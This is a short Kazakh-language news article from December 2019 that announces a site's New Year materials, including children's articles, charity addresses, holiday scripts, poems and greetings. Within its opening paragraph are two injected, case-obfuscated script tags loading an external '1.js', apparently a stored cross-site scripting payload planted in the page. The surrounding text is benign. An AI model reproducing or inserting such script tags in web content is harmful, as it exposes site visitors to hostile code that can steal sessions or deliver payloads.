Жаңа жыл – әлемдегі қуанышқа толы ең ғажайып мерекелердің бірі. Жаңа жыл – жаңару, даму, ілгерілеу. Жаңа жыл – өткенге салауат айтып, болашақтан үміт күту.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.12.2019

      Тағы бір жыл артта қалып, төрімізге Жаңа жыл келмек. Санаулы күндерден кейін ескі жылмен есептесіп, Жаңа жылды құшақ жая қарсы аламыз.  Барша жұрт келе жатқан жаңа жылдан жарқын ертегі, жаңа бақыт күтеміз.

Осы ретте, яғни Жаңа жыл қарсаңында оқырман назарына Жаңа жылға қатысты барлық дүниелер жарияланып жатыр.

Мәселен, балаларға арналған әлемдегі Аяз ата мекендері туралы танымдық мақала жарық көрді. 

Әрбір адам Жаңа жылды төріне шығармас бұрын ескі жылда жасаған жақсылықтарына бір тоқталып өтеді. Осы ретте Жаңа жылда қайырымдылық жасау үшін барлық көмекке мұқтаж еліміздің әр түкпіріндегі көмек қолын созған балалардың мекен-жайын көрсеттік.

Жаңа жыл жақындағанда түрлі мерекелер, түрлі концерттік бағдарламалар, түрлі кештер өтеді. Осыған байланысты әртүрлі көріністер қоюға жаңажылдық сценарий де бар. 

Жаңа жыл қарсаңында ең белсенді болатын мектеп оқушылары. Мектеп оқушыларына арналған жаңажылдық бағдарлама да әзірленді. 

Мектеп оқушылары, мектеп жасына дейінгі балалар үшін Жаңа жылға арналған тақпақтар, өлеңдер жарияланды.

Құттықтаулар мен жаңажылдық ойындар да бар. 

Жаңа жыл – отбасылық мереке. Сондықтан, отандық арналар Жаңа жылға қандай тосын сый жасап жатыр? Біле жүріңіз! 

Толеуова А.А.

Просмотров: 635


Пікір қосу



Деректерді қолтаңбаға қосу